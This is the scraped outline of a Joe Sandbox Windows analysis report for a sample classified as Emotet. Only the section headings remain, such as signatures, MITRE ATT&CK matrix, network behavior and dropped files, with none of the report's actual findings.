Graph

Loading ...

Warning!

Windows Analysis Report snBYiBAMB2

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage